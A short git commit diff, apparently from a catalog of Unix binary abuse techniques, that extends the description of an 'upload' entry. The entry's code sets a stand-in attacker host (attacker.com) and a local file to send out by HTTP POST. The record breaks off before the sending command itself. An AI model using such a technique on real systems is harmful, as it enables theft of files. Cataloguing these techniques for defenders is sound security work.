Fix description

This commit is contained in:
Emilio Pinna 2018-05-25 18:57:26 +01:00
parent 9af7c514a6
commit b06bb08f96

View File

@ -1,7 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file with an HTTP POST request. - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
URL=http://attacker.com/ URL=http://attacker.com/
LFILE=file_to_send LFILE=file_to_send